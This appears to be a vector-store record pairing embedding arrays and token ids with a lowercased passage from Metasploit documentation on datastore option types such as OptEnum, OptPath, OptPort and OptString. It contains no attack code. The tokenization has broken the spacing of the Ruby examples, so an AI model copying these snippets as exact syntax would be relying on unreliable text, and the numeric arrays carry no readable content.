0.26101401448249817, 0.39056697487831116, 0.35945823788642883, -0.33702629804611206, -0.2555738687515259, -0.48121410608291626, 0.8898168802261353, 0.5737329125404358, -0.09062138199806213, -0.5875943899154663, -0.31819140911102295, -0.5246403813362122, -0.9824085831642151, 0.8461065888404846, -0.18826580047607422, -0.11640562862157822, -0.35948023200035095, -0.36668264865875244, 0.5165074467658997, 0.007327808998525143, -0.41962048411369324, 0.791342556476593, 0.560751736164093, -0.3694840371608734, -0.28776562213897705, -0.3247726261615753, 0.6419445276260376, -0.11768743395805359, 0.4907969832420349, -0.5229361653327942, -0.094646155834198, -0.19632256031036377, -0.41332802176475525, 0.1626439243555069, -0.6958673000335693, -0.15833841264247894, 0.16194574534893036, 0.06971817463636398, 0.5399479269981384, -0.1225057989358902, -0.47231268882751465, -0.15400095283985138, 0.38449758291244507, -0.3632259964942932, -0.8384661674499512, 0.9624359011650085, 0.9071983098983765, 0.16335764527320862, 0.3769632577896118, 0.40335774421691895, -0.1516219526529312, -0.2653134763240814, 0.4542241394519806, 0.39515018463134766, -0.7086551189422607, 1.3723984956741333, 0.2794467806816101, -1.4093968868255615, -0.33208730816841125, -0.5938435792922974, -0.09695307910442352, 0.6808847188949585, -0.32956743240356445, -0.006078831851482391, 0.9416131377220154, 0.1913287192583084, 0.02386707067489624, 0.3139559328556061, 0.36641356348991394, 0.5864772796630859, -1.0956659317016602, 0.7403759956359863, -0.1316470354795456, 0.47543489933013916, 0.7208824753761292, -0.34540244936943054, 0.27414482831954956, -0.37645813822746277, 0.33129358291625977, 0.20860151946544647, -0.36231228709220886, 1.024610996246338, 0.08598826080560684, 0.03296084329485893, 0.11159075796604156, -0.024942923337221146, 0.7808204889297485, 0.027173180133104324, 0.09613710641860962, 1.0666580200195312, 0.09770212322473526, -0.47251448035240173, -0.28807488083839417, 0.11536751687526703, 0.24681785702705383, 0.031786736100912094, -0.4177892506122589, -0.6142356991767883, 0.14656193554401398, 0.4448774456977844, -0.3087415397167206, -0.5247707366943359, -0.5045155882835388, -0.3613380789756775, -0.047213222831487656, 0.24834872782230377, -0.4811300039291382, -0.09372053295373917, 0.36117932200431824, 0.24972550570964813, 0.34111130237579346, -0.7239363193511963, 0.1778898686170578, 0.2019486278295517, 0.42788782715797424, -0.46963703632354736, -0.1786995679140091, -0.574137270450592, -0.34746336936950684, -0.5138506293296814, -0.28718578815460205, -0.05830395221710205, -0.16847342252731323, 0.24462492763996124, 0.007083457428961992, -0.7816081047058105, 0.6480244398117065, -0.7408037185668945, -0.15620830655097961, -0.35081014037132263, -1.2140222787857056, 0.35372868180274963, 0.2603456676006317, -0.23949803411960602, 0.24005581438541412, 0.16892869770526886, 0.30701157450675964, -0.19767554104328156, -1.3820326328277588, 0.1355266571044922, 0.4659152030944824, -0.25037258863449097, -0.44122761487960815, 0.5836103558540344, -0.7013071775436401, -0.028820140287280083, -0.06622304767370224, -0.22468557953834534, -0.06050559878349304, -0.3174024224281311, 0.2679414451122284, 0.34979233145713806, -0.28172022104263306, -0.2936500012874603, 0.8813245296478271, 0.3723672032356262, 0.4024527668952942, -0.7902795672416687, 0.8455243110656738, 0.211138516664505, -0.6064167618751526, -0.35871025919914246, 0.5465541481971741, 0.6126261353492737, -0.37157899141311646, 0.3545723855495453, 0.19985714554786682, -0.6899287700653076, 0.24346770346164703, -0.08410345762968063, 0.016340309754014015, -0.6368428468704224, -0.3802485764026642, 0.39537423849105835, 0.456808477640152, 0.6196297407150269, 0.06433770805597305, 1.0555921792984009, -0.6524408459663391, -0.8799363374710083, 0.4136560559272766, -0.1839807629585266, 0.4300248920917511, 0.25528037548065186, -0.4218652844429016, -0.1323852241039276, -0.7351537942886353, -0.3548038601875305, 0.3638473153114319, 0.1979554146528244, 0.30917981266975403, 0.5210856199264526, 0.3768433928489685, -0.38960567116737366, 0.8702284693717957, -0.6206261515617371, -1.1185431480407715, -0.19436396658420563, 0.10599107295274734, -0.3475677967071533, -1.07229745388031, 0.7661762833595276, -0.11850828677415848, 0.12005464732646942, -0.14801833033561707, -0.5695005059242249, 0.4219619929790497, 0.4698835611343384, 0.5106760859489441, 0.5054207444190979, 0.5257010459899902, -0.5295438170433044, 0.7194145321846008, -0.7526035308837891, 0.4205104112625122, -0.11176228523254395, 0.18620255589485168, 0.22603334486484528, -0.03611345589160919, -0.4660874307155609, 0.42238685488700867, -0.29216432571411133, -0.40532374382019043, 0.7242792248725891, 0.6486730575561523, 0.4660978615283966, -0.6479619145393372, 0.11921350657939911, -0.14922060072422028, 0.6074934005737305, 0.5152639746665955, 0.5285716652870178, -0.20950859785079956, 0.05105263367295265, 0.5565383434295654, -1.2020597457885742, -0.27886298298835754, 0.6346334218978882, 0.5460257530212402, -0.7426161170005798, -0.03970547392964363, 0.5620946288108826, 0.140437051653862, -0.5512207746505737, -0.18772074580192566, -0.07875416427850723, -0.18322962522506714, 0.479122132062912, 0.28607162833213806, -0.3423962891101837, 0.6336407661437988, -0.713041365146637, 0.25531360507011414, -0.24080577492713928, 0.2672059237957001, -0.230207160115242, -0.25007951259613037, -1.0138877630233765, -0.0025073967408388853, 0.5060134530067444, 0.08868597447872162, -0.9187054634094238, 0.7825731039047241, -0.19276930391788483, 0.19430223107337952, -0.30606508255004883, -0.39193883538246155, -0.662851095199585, 0.1780451238155365, 0.06013902649283409, -1.0977630615234375, -1.029591679573059, 0.12870316207408905, 0.4194237291812897, 0.19854305684566498, 0.2713141143321991, -0.5449343323707581, 0.011930837295949459, -0.7211821675300598, 0.4785977005958557, -0.4184974431991577, -0.07864774018526077, 1.0274443626403809, 0.015452836640179157, -0.36054208874702454, 0.7447188496589661, 0.36726173758506775, 0.44924822449684143, 0.027217278257012367, 0.7677596807479858, 0.1684742420911789, 0.4397510290145874, -0.020090436562895775, -0.6216962337493896, -0.19593004882335663, -0.46331357955932617, -0.37308359146118164, -0.307035893201828, 0.21257157623767853, -0.22656472027301788, 0.6716262698173523, 0.15720364451408386, -0.07521221786737442, -0.9160545468330383, -0.05773910507559776, -0.8721753358840942, -0.1960275024175644, -0.2238083779811859, 0.1808101385831833, -0.7289718389511108, -0.1080860048532486, -0.22856010496616364, -0.126067116856575, 0.7200589776039124, -0.3390044569969177, -0.6806538701057434, 0.010181494057178497, 0.30370786786079407, 0.25994420051574707, 0.44116121530532837, -0.23475563526153564, -0.2958594858646393, 0.1579722762107849, -1.0874216556549072, -0.5662087798118591, 0.45390069484710693, -0.4468629062175751, -0.3661237359046936, 0.8906677961349487, 0.659741997718811, 0.36822056770324707, 0.5409866571426392, -0.15957005321979523, 0.19186824560165405, -0.5383076667785645, 0.5578734874725342, -0.6156600117683411, 0.5076944231987, 0.5640239119529724, -0.21527479588985443, 0.9568047523498535, 1.039509654045105, 0.8876535892486572, -0.25109046697616577, 0.03142980858683586, -0.07743323594331741, -0.02304823137819767, -0.6019176840782166, -0.13655345141887665, -0.012548240832984447, -0.3469054102897644, 0.11397305130958557, 0.1274634748697281, -0.49246397614479065, -0.08790723979473114, -0.8468487858772278, 0.4224839508533478, 0.08591724187135696, 0.7991843819618225, 0.0645618811249733, 0.4910907745361328, 0.32216647267341614, -1.1361345052719116, 4.1087846755981445, 0.7474037408828735, 0.5043643712997437, 0.11837950348854065, 0.6475553512573242, 0.40607160329818726, 1.2274686098098755, -0.6028024554252625, 0.5451677441596985, -0.4224773645401001, 0.922534167766571, -0.36181673407554626, 0.3466188311576843, 0.12367486953735352, -0.13117453455924988, -0.05976099520921707, -1.1355336904525757, 0.6104470491409302, 0.6352318525314331, -0.899601399898529, -0.9957253932952881, -0.23673762381076813, -0.11587567627429962, 0.3595592975616455, 0.29310742020606995, -0.026467373594641685, -0.2646893560886383, -0.6026228666305542, 0.1273902952671051, -0.4101880192756653, 0.15606749057769775, -0.5069356560707092, 0.2647857069969177, 0.04923098161816597, -0.3766738176345825, -0.5041235089302063, 0.5877212285995483, -0.12026689946651459, -0.7700376510620117, 0.23498070240020752, 0.6283424496650696, 0.28418898582458496, 0.29484036564826965, -0.4812244474887848, 0.12028662115335464, -0.08761905878782272, -0.7480325102806091, 0.07505644857883453, 0.41024574637413025, -0.49066001176834106, 0.7425227761268616, -0.033805884420871735, 0.717106282711029, 0.6348923444747925, -0.4278356432914734, 1.1435010433197021, 0.5640560984611511, -0.2734302878379822, 0.2623927593231201, -0.1147184893488884, 0.2730296552181244, -0.3472379744052887, 0.24447430670261383, -0.2832080125808716, -0.7228838801383972, 0.1479623019695282, 0.043594732880592346, 0.6443770527839661, 0.30244627594947815, -0.49099838733673096, -0.17674675583839417, -0.2543056607246399, -0.14387346804141998, -0.18427060544490814, 1.003541350364685, -0.673743486404419, -0.4389098286628723, -0.07646942883729935, 0.18448315560817719, -0.25519657135009766, -0.27168983221054077, -0.8285027742385864, -1.0295885801315308, 0.5227277874946594, 0.5556636452674866, 0.36259427666664124, 0.09774629771709442, -1.2074637413024902, 0.48076289892196655, -0.19957448542118073, -0.007962098345160484, 0.30630847811698914, -0.5893823504447937, -0.12015540152788162, 0.08104486763477325 ]
[ 10175, 5657, 1011, 1037, 12398, 3643, 1012, 3602, 2065, 1996, 2034, 17961, 2003, 6270, 1010, 2017, 2123, 1521, 1056, 2342, 2000, 3073, 1037, 3643, 1010, 2009, 1521, 2222, 2022, 2275, 2000, 9152, 2140, 8073, 1012, 4372, 18163, 1011, 11887, 2019, 9140, 1997, 11701, 5300, 1010, 1041, 1012, 1043, 1012, 1003, 1059, 1031, 2187, 2157, 1033, 1012, 14593, 2229, 1011, 11887, 1010, 3145, 1011, 2773, 2069, 2019, 9140, 1997, 3176, 3415, 2008, 6523, 2000, 2023, 5724, 1012, 2023, 2003, 6179, 2043, 24944, 1037, 2951, 23809, 2063, 5724, 2000, 9279, 8848, 21778, 1012, 2156, 1996, 24944, 2951, 23809, 2063, 7047, 2930, 2005, 2062, 2592, 8663, 20562, 2015, 1011, 11887, 1010, 3145, 1011, 2773, 2069, 2019, 9140, 1997, 1037, 4650, 2005, 2029, 1996, 5724, 2323, 2022, 6913, 1012, 2023, 2064, 2022, 2109, 2000, 5342, 7047, 2043, 2027, 2024, 22537, 2241, 2006, 2060, 22354, 1012, 2156, 1996, 22910, 2951, 23809, 2063, 7047, 2930, 2005, 2062, 2592, 1012, 2991, 12221, 11887, 1010, 3145, 1011, 2773, 2069, 2019, 9140, 1997, 3415, 2008, 2097, 2022, 2109, 2004, 1037, 2991, 5963, 2065, 1996, 2364, 5724, 2171, 2003, 4225, 2011, 1996, 5310, 1012, 2023, 2003, 6179, 1999, 1996, 11967, 1997, 5782, 17009, 5724, 3415, 2107, 2004, 15488, 8286, 2121, 1010, 2021, 2000, 2036, 2490, 28266, 9361, 1037, 2862, 1997, 2062, 12391, 2991, 12221, 5724, 3415, 2107, 2004, 5310, 18442, 1012, 2023, 15380, 2003, 2747, 2369, 1037, 3444, 5210, 1010, 2275, 2007, 2838, 2275, 2951, 23809, 2063, 1035, 2991, 12221, 2995, 1999, 5796, 11329, 5644, 9890, 19779, 2292, 1521, 1055, 2831, 2055, 2054, 4280, 2024, 2800, 1024, 23569, 4215, 16200, 11488, 2078, 7953, 2008, 2003, 2019, 12997, 2615, 2549, 4769, 1012, 3642, 2742, 1024, 23569, 4215, 16200, 4757, 1012, 2047, 1006, 1005, 12997, 1005, 1010, 1031, 2995, 1010, 1005, 2275, 2019, 12997, 1005, 1010, 1005, 2184, 1012, 1014, 1012, 1015, 1012, 1017, 1005, 1033, 1007, 23569, 4215, 16200, 4757, 24388, 11219, 7953, 2008, 2003, 1037, 2846, 1997, 12997, 2615, 2549, 11596, 1010, 2005, 2742, 1024, 2184, 1012, 1014, 1012, 1015, 1012, 1015, 1011, 2184, 1012, 1014, 1012, 1015, 1012, 2322, 1010, 2030, 2184, 1012, 1014, 1012, 1015, 1012, 1015, 1013, 2484, 1012, 2017, 2064, 2036, 4425, 1037, 5371, 4130, 2612, 1997, 1037, 2846, 1010, 1998, 2009, 2097, 8073, 7438, 2008, 5371, 2004, 1037, 2862, 1997, 12997, 2015, 1012, 2030, 1010, 2065, 2017, 2079, 1996, 14566, 1024, 1017, 20231, 1010, 2007, 1017, 3574, 1017, 2335, 1010, 2009, 2097, 9699, 1017, 6721, 12997, 2015, 2005, 2017, 1012, 3937, 3642, 2742, 1024, 23569, 4215, 16200, 4757, 24388, 2063, 1012, 2047, 1006, 1005, 2846, 1005, 1010, 1031, 2995, 1010, 1005, 2275, 2019, 12997, 2846, 1005, 1010, 1005, 2184, 1012, 1014, 1012, 1015, 1012, 1017, 1011, 2184, 1012, 1014, 1012, 1015, 1012, 2603, 1005, 1033, 1007, 23569, 5092, 4747, 5092, 9890, 2319, 5724, 1012, 2009, 2097, 9398, 3686, 2065, 1996, 7953, 2003, 1037, 8349, 1997, 2593, 2995, 2030, 6270, 1012, 2005, 2742, 1024, 1061, 1010, 2748, 1010, 1050, 1010, 2053, 1010, 1014, 1010, 1015, 1010, 4385, 1012, 3642, 2742, 1024, 23569, 5092, 4747, 1012, 2047, 1006, 1005, 27984, 1005, 1010, 1031, 2995, 1010, 1005, 2275, 1037, 27984 ]
metasploit
116.txt
2
option ', false ] ) optenumbasically this will limit the input to specific choices. for example, if you want the input to be either β€œ apple ”, or β€œ orange ”, and nothing else, then optenum is the one for you. code example : # choices are : apple or range, defaults to apple optenum. new ('fruit ', [ true,'set a fruit ','apple ', ['apple ','orange'] ] ) optintthis can be either a hex value, or decimal. optint. new ('file ', [ true,'a hex or decimal ', 1024 ] ) optpathif your datastore option is asking for a local file path, then use this. optpath. new ('file ', [ true,'load a local file'] ) optportfor an input that ’ s meant to be used as a port number. this number should be between 0 - 65535. code example : optport. new ('rport ', [ true,'set a port ', 21 ] ) optrawit actually functions exactly the same as optstring. optregexpdatastore option is a regular expression. optregexp. new ('pattern ', [ true,'match a name ','^ alien'] ), other types : in some cases, there might not be a well - suited datastore option type for you. the best example is an url : even though there ’ s no such thing as a opturl, what you can do is use the optstring type, and then in your module, do some validation for it, like this : def valid? ( input ) if input = ~ / ^ http : \ / \ /. + / i return true else # here you can consider raising optionvalidateerror return false end end if valid? ( datastore ['url'] ) # we can do something with the url else # not the format we're looking for. refuse to do anything. end optstringtypically for a string option. if the input begins with β€œ file : / / ”, optstring will also automatically assume this is a file, and read from it. however, there is no file path validation when this happens, so if you want to load a file, you should use the optpath instead
[ -0.01354716345667839, -0.2163858562707901, 0.5037487745285034, -0.004426190163940191, -0.46232324838638306, 0.011814622208476067, 0.43549302220344543, -0.036480821669101715, 0.06433270126581192, 1.3517320156097412, 0.5547776222229004, -0.6141439080238342, 0.4088352620601654, -0.21233707666397095, -0.662909746170044, -0.3201938271522522, -0.5567611455917358, -0.423149049282074, -1.0057517290115356, -0.5317671298980713, 0.3396855592727661, -0.020319566130638123, -0.6463547945022583, -0.7349709272384644, -0.7521470189094543, 0.3397212326526642, 1.122109055519104, 0.12776021659374237, 0.4752601087093353, 0.6666104793548584, 0.44044581055641174, -0.08787907660007477, -0.12144088000059128, -0.5013658404350281, -0.3470652401447296, -0.18225841224193573, 0.916263997554779, -0.48427706956863403, -0.16699232161045074, -0.023423179984092712, 0.3998272716999054, -0.2639482021331787, 0.02324051223695278, -0.5567325353622437, -0.2729930877685547, -0.7591972947120667, 0.13506647944450378, -0.8566640615463257, -0.33349528908729553, -0.06946267932653427, -0.055359065532684326, -0.10826702415943146, 0.511938750743866, 0.25139060616493225, -0.328154981136322, -0.37193822860717773, -0.14047683775424957, 0.2626086175441742, -0.8954444527626038, 0.47723889350891113, -0.3784120976924896, 0.10068872570991516, 0.37156522274017334, -0.7511213421821594, -0.34223672747612, 0.7795844674110413, 0.030836742371320724, 0.06201879307627678, -0.15662407875061035, -0.430215448141098, -0.19078189134597778, 0.5912045240402222, -0.6481321454048157, -0.4726336896419525, -0.003394521540030837, 0.14271070063114166, 0.22709645330905914, 0.2242586612701416, -0.388802170753479, 0.2628979980945587, -0.6086173057556152, 0.28174784779548645, 0.3037318289279938, -0.19895105063915253, -0.12956081330776215, -0.011729407124221325, 0.647555410861969, 0.5980311036109924, -0.23908409476280212, -0.5548675060272217, 0.5614332556724548, 0.24126824736595154, -0.46222585439682007, -0.12343873083591461, 0.976090669631958, 0.538107693195343, -0.10605105012655258, 0.3319249153137207, 0.3414146900177002, -0.18859942257404327, 0.8243647217750549, 1.651019811630249, 0.25875476002693176, 0.6690823435783386, -0.2025773823261261, 0.7834880352020264, -0.47894996404647827, 0.4959353804588318, -0.6615911722183228, -0.2067936360836029, 0.26052650809288025, -0.4888027310371399, 0.03786187991499901, -0.4921024441719055, -0.5847790837287903, 0.2932645082473755, 0.2104024887084961, 0.25400179624557495, -0.38345956802368164, 0.28263893723487854, -1.0251647233963013, 0.15932127833366394, -0.07307746261358261, -0.10840276628732681, 0.5290347337722778, -0.08955994993448257, -0.03225364163517952, 0.024949319660663605, -0.6377859711647034, -0.36268195509910583, 0.8586806058883667, 0.7216492295265198, 0.565933108329773, 0.7547186017036438, -0.21104168891906738, 0.9135562181472778, -0.08576260507106781, 0.5138707160949707, 0.5116316080093384, -0.2600288689136505, 0.3613443374633789, 0.14256654679775238, 0.2904282808303833, 1.296562910079956, 0.24092599749565125, -0.20814506709575653, -0.6575490832328796, -0.14996293187141418, -0.32664942741394043, 0.7881039381027222, -0.36134129762649536, 0.11817645281553268, 0.050758976489305496, -0.4264480173587799, -0.5454531908035278, 0.4801400601863861, 0.07358568906784058, 0.49457570910453796, -0.122834712266922, -0.12558472156524658, -0.2033027559518814, 0.877257227897644, -0.07352320104837418, 0.5533555746078491, -0.4545281231403351, 0.2827407419681549, -1.2756296396255493, -0.4615670144557953, 0.07441040873527527, 0.6073631644248962, 0.06642425060272217, 0.033453162759542465, 0.16335713863372803, 0.025678951293230057, 1.2800090312957764, 1.0331971645355225, 0.5130772590637207, -0.2956676781177521, -0.2808469533920288, 0.30030009150505066, -1.0585232973098755, 0.6226754188537598, 0.3641960918903351, 0.7317469716072083, -0.006841613911092281, 0.5243675112724304, -0.36807432770729065, -0.0880977064371109, -0.3531997501850128, -0.20721875131130219, -0.20902462303638458, 0.09847867488861084, -0.2530551254749298, 0.16899988055229187, 0.1047535091638565, 0.3755756616592407, -0.8271222114562988, 0.038967929780483246, -0.32950666546821594, -1.1724694967269897, -0.5091748237609863, -0.010283353738486767, 0.2622968256473541, 0.4402368664741516, 0.14269666373729706, -0.6651651859283447, 0.08334332704544067, 0.8900195360183716, -0.4093020558357239, 0.4184647500514984, 0.40252017974853516, 0.10358309000730515, -0.2711162865161896, 0.19849389791488647, 0.15154477953910828, -0.10886184871196747, -0.5180879831314087, 0.3761920630931854, -0.1796858161687851, 0.7759392857551575, 0.22905321419239044, 0.8547354936599731, 0.6771602630615234, 0.5870370864868164, -0.1915518045425415, -0.01935829222202301, -0.06864793598651886, 0.6766369938850403, -0.18034569919109344, 0.4935976564884186, -0.35235098004341125, 0.7638961672782898, 0.07828270643949509, 1.0897005796432495, 0.20201291143894196, -0.09912180155515671, 0.93429034948349, -0.1838453859090805, -0.04099500924348831, 0.11301958560943604, -0.4201567471027374, 1.1702755689620972, 0.7959680557250977, 0.69219970703125, -0.07815282046794891, 0.4459291994571686, -0.17871485650539398, -0.055717144161462784, 0.013640808872878551, 0.6047462821006775, -0.3627573847770691, 1.0650787353515625, 0.3038278818130493, -0.28585436940193176, -1.1239917278289795, -0.8921163082122803, 0.792570173740387, 0.5895126461982727, -0.2834635078907013, -1.105602741241455, 0.3379462659358978, -0.15500296652317047, -0.6389049887657166, -0.06279606372117996, 0.022491417825222015, 0.38732850551605225, -0.174020454287529, 0.07617578655481339, -0.030956463888287544, -0.5702521800994873, -0.630256712436676, -0.2884672284126282, -1.0958415269851685, -0.26751625537872314, -0.6067348122596741, -0.19576995074748993, -0.1674458235502243, -0.2498329132795334, 0.8442680835723877, -0.6032794117927551, -0.7477219700813293, 0.008748420514166355, 0.28232085704803467, 0.403811514377594, 0.2948439419269562, 0.21163514256477356, -0.7208679914474487, 0.021149765700101852, -0.1646520048379898, 1.428526759147644, 0.28103625774383545, -0.5101990699768066, -0.21971875429153442, -0.22436490654945374, 0.2045714557170868, -0.1523311734199524, 0.9990818500518799, 0.667998731136322, -0.11836031079292297, -0.22162069380283356, -0.14565147459506989, 0.0372973196208477, 0.03779461607336998, 0.37444251775741577, -0.283006489276886, 0.212076798081398, -0.20795458555221558, -0.2504575252532959, 0.6141857504844666, 0.2373639941215515, -0.7831345200538635, 0.06174519285559654, 0.250851035118103, 0.38733360171318054, -0.36733540892601013, 0.2881108522415161, 0.2846481502056122, -0.2245102822780609, -0.013635019771754742, 0.1736433207988739, 0.1744464933872223, -0.2727193832397461, -0.11068913340568542, 0.23358747363090515, -0.28587815165519714, 0.6841738224029541, -0.48336929082870483, -0.8118119835853577, -0.07364127784967422, -0.3095964789390564, -0.21899020671844482, -0.4673568606376648, 0.05380028486251831, 1.1945871114730835, 0.048589807003736496, -0.2051822394132614, -0.14453905820846558, -0.6929783225059509, -0.15240274369716644, 0.24886642396450043, -0.2608789801597595, -1.028523325920105, 0.09722433984279633, 0.3986545205116272, 0.6478026509284973, 0.7773231267929077, 0.2365839183330536, -0.38574954867362976, -0.5164824724197388, -0.34698861837387085, 0.3122521936893463, -0.0939052477478981, 0.11221200227737427, -0.041839707642793655, 0.030725780874490738, 0.3983362317085266, -0.43523073196411133, 0.1970471739768982, 0.2387780100107193, 0.13821019232273102, 0.4559277296066284, 0.476589173078537, -0.33770042657852173, 0.14092062413692474, -0.11535939574241638, -0.734616756439209, -0.0799664705991745, 0.42051148414611816, 0.3108634650707245, -0.3241114020347595, 0.5518572330474854, -0.5140036344528198, -0.07832954823970795, 0.36998629570007324, 0.3525986671447754, -0.35469281673431396, 1.0309009552001953, -0.19169147312641144, 0.8726940155029297, -0.9499150514602661, 0.0721995010972023, -0.35084885358810425, -0.5078331828117371, 0.27064141631126404, 0.5374890565872192, 0.2106866091489792, 0.05768529698252678, -0.4292873740196228, -0.13688541948795319, -0.6404958963394165, 0.022029664367437363, -0.08627834916114807, -0.06284702569246292, -0.8467344641685486, -0.6147719025611877, -0.9440517425537109, 0.3594488203525543, 0.29932984709739685, 0.505227267742157, 0.4733336865901947, 0.3457905352115631, -0.6231408715248108, -0.15420463681221008, 0.3127600848674774, -0.2764826714992523, 0.2867431640625, 0.10767711699008942, 0.827750027179718, 0.13215044140815735, 0.2938989996910095, -0.775569498538971, -0.6459072232246399, -0.582576334476471, -0.2759525179862976, -0.10396435856819153, 0.2673276364803314, -0.7397975921630859, -0.22336186468601227, 0.365559846162796, 0.4394531846046448, -0.6606627702713013, -0.35867100954055786, -0.49617981910705566, 0.7660613656044006, 0.7567282915115356, -0.930288553237915, -0.9009287357330322, -0.731086254119873, 0.2369973063468933, 0.4743480086326599, 0.41588476300239563, -0.053947120904922485, -0.6528428196907043, -0.43736380338668823, -0.9313566088676453, 0.4002930819988251, 0.8660382032394409, -0.4202553629875183, 0.5282909870147705, -0.7106964588165283, -0.401900053024292, 0.5813558101654053, -0.27113261818885803, -0.3859180510044098, 0.04654429480433464, 0.4552507996559143, -0.33330610394477844, 0.505898654460907, -1.1840779781341553, -0.49725770950317383, 0.4356611371040344, -0.8874420523643494, 0.7155820727348328, -1.056614637374878, 0.5714554190635681, 0.39537492394447327, 0.15599319338798523, -0.1831548511981964, 0.1047092080116272, -1.0196627378463745, 0.034548379480838776, 0.17339035868644714, 0.31254613399505615, -0.04223553091287613, -0.32202038168907166, 0.2477821409702301, -0.4560263454914093, -0.4230847954750061, 0.6713597774505615, -0.09150637686252594, -0.004184472840279341, 0.16204425692558289, -0.5802767872810364, -0.7476786375045776, 0.8986709713935852, -0.9925889372825623, 0.49621081352233887, -0.1309114545583725, 0.22470234334468842, -0.21845802664756775, -0.9408233761787415, 0.5189491510391235, 0.5183934569358826, -0.21889181435108185, 0.06096615642309189, -0.3918797969818115, 0.43571072816848755, -0.010172771289944649, 0.08174023777246475, 0.37634018063545227, -0.008309444412589073, -0.1680971384048462, -0.2853505611419678, -0.726912796497345, -0.9348931908607483, -0.5805193185806274, -0.1650223731994629, 0.12781089544296265, 0.05710947513580322, 0.30956724286079407, 0.39225488901138306, -0.6629087328910828, -0.569700300693512, 0.29089727997779846, -0.4212968349456787, 0.45331135392189026, -0.5038886666297913, -0.43244901299476624, -0.6097007393836975, 0.4791189730167389, -0.21882906556129456, 0.7001477479934692, -0.08880499005317688, 0.31319236755371094, 0.19048407673835754, 0.30692484974861145, 0.06953723728656769, -0.4741826355457306, -0.6898011565208435, 1.01150381565094, -0.6885301470756531, -0.8472155928611755, 0.25370749831199646, 0.5319438576698303, -0.42393478751182556, 0.5567172169685364, -0.22478900849819183, -0.5159507393836975, -1.223008155822754, -0.7632020711898804, 0.4240228831768036, -0.4939625561237335, 0.1404706984758377, -1.1429263353347778, -1.0211215019226074, -0.8322557210922241, 0.27658596634864807, -0.4801008403301239, -1.107806921005249, 0.004199422895908356, 0.09759095311164856, -0.15613996982574463, -0.08548994362354279, 0.3983060419559479, -0.2432052344083786, -0.718529462814331, 0.0018363870913162827, 0.8518416881561279, -0.1962747573852539, 0.1483573019504547, 0.4860840439796448, -0.08730475604534149, 0.5588222146034241, 0.4815959334373474, -0.879927933216095, 0.020526692271232605, -0.4059828221797943, 0.11318691074848175, -0.8445756435394287, -0.0357527881860733, -0.25580838322639465, 0.6442854404449463, -0.29498279094696045, 0.275055468082428, 0.39202478528022766, -0.021511176601052284, 0.24975357949733734, 0.4385720491409302, 0.8099339604377747, -0.4437873363494873, 0.32164236903190613, -0.7413532733917236, 0.794141411781311, 1.0643788576126099, -0.06863950192928314, -0.9455748200416565, 0.15440233051776886, -0.3181719481945038, -1.1908314228057861, 0.19594526290893555, 0.061347026377916336, 0.4542998969554901, -0.3539552688598633, -0.1592424511909485, 0.5342814922332764, -0.5364987254142761, -0.40067973732948303, 0.9923589825630188, 0.7220436334609985, -0.04839463531970978, -0.16933570802211761, 0.39837417006492615, 0.30747413635253906, -0.3498600125312805, 0.8308375477790833, -0.2724642753601074, -0.07883231341838837, -0.7271246314048767, -0.18065251410007477, -0.7422975301742554, -1.1546183824539185, 0.11875533312559128, 0.6299947500228882, 0.16063924133777618, 0.4263366758823395, -0.21570716798305511, -1.0967519283294678, -0.25968992710113525, 0.32760369777679443, -0.608858048915863, -0.5503184199333191, 0.7376782894134521, 1.2062268257141113, 0.01998578943312168, 0.48638680577278137, -0.2629532516002655, -0.5721746683120728, 0.005998416803777218, 0.3792455494403839, 0.4044663906097412, 0.06977217644453049, 1.3021329641342163, 0.4892503321170807, -1.8886688947677612, -0.5893021821975708, -0.5231649875640869, -0.47039923071861267, 0.3692183792591095, -0.5460026264190674, 0.0011036780197173357, 0.04115945100784302, 0.0008623322937637568, -0.550423800945282, 0.619925856590271, -0.08051463216543198, 0.5901722311973572, -0.7067962288856506, 0.9765495657920837, -0.03346552699804306, -0.09124279767274857, 1.0187958478927612, -0.9158968329429626, -0.3133569359779358, -0.48007750511169434, 0.4380948543548584, 0.3746480643749237, 0.06929037719964981, 1.1770151853561401, 0.058263149112463, 0.02052488550543785, 0.15628691017627716, 0.3917636275291443, 0.7892050743103027, -0.43762919306755066, 0.24651341140270233, 0.3530026376247406, -0.2250734120607376, -0.8552825450897217, -0.5203109979629517, 0.7558568716049194, 0.06081238016486168, 0.45057108998298645, 0.05022277683019638, -0.5937106609344482, -0.4203825891017914, 0.8832485675811768, -0.3906017243862152, -0.8259955644607544, -0.5385780930519104, -0.6732205748558044, -0.34995031356811523, -0.014539080671966076, -0.4856633245944977, -0.3263915181159973, 0.5684171319007874, 0.02285763807594776, -0.35726672410964966, -0.3720386028289795, 0.2911126911640167, -0.06851939857006073, 0.02967190369963646, -0.478916734457016, 0.39000076055526733, -0.5715988874435425, -0.01716528832912445, -0.7420878410339355, -0.14066533744335175, -0.7681193947792053, -0.376743882894516, -0.2569182515144348, 0.009534964337944984, -0.8878975510597229, 0.7263220548629761, -0.5707034468650818, 0.3317714035511017, -0.010150394402444363, -0.15687806904315948, 0.36355844140052795, 0.33339351415634155, 0.02224181406199932, 0.7464404702186584, 0.387994647026062, 0.31983381509780884, -0.18567799031734467, -0.8552801609039307, 0.3246631920337677, 0.36244305968284607, 0.23117400705814362, 0.0718703493475914, 0.1812652200460434, -0.17809857428073883, -0.01465357095003128, -0.053317610174417496, -1.0719386339187622, 0.09547725319862366, -0.5711441040039062, 0.0002408015716355294, 0.11632662266492844, -0.003653367282822728, 0.475728839635849, 1.1535669565200806, 0.2015320360660553, 0.5324514508247375, -0.8694474697113037, 0.033415671437978745, 0.13198783993721008, -0.897361695766449, -0.22582639753818512, 0.6478935480117798, 0.1498439610004425, -0.9177579283714294, -0.4782946705818176, 0.5563338994979858, -0.7635512351989746, 0.3505139648914337, -0.14607930183410645, -0.05672287940979004, -0.6547144055366516, 0.5512976050376892, 0.12749162316322327, 0.3737785220146179, 0.8424462676048279, -0.4653688073158264, 0.6131405234336853, -0.258562833070755, -0.6782578229904175, 0.27417951822280884, -0.7439149022102356, -0.6115406155586243, -0.10797861218452454, -0.4682539105415344, -0.4877733290195465, -0.3656752407550812, -0.5581777691841125, -0.12261640280485153, 0.25029897689819336, -0.29003721475601196, 0.30754467844963074, 0.8456811308860779, -0.2673570513725281, 0.5897449254989624, -0.45121878385543823, -0.7221198081970215, -0.03124435618519783, 0.03392806276679039, -0.4606163501739502, -0.8482677936553955, 0.4305715262889862, 0.44771501421928406, 0.5667803287506104, -0.20260633528232574, -0.45491328835487366, 0.27961888909339905, 0.4068215489387512, 0.20439116656780243, 0.19234640896320343, 0.23696108162403107, -0.5204980969429016, 0.06735652685165405, -0.841766357421875, 0.22969909012317657, 0.2814681828022003, 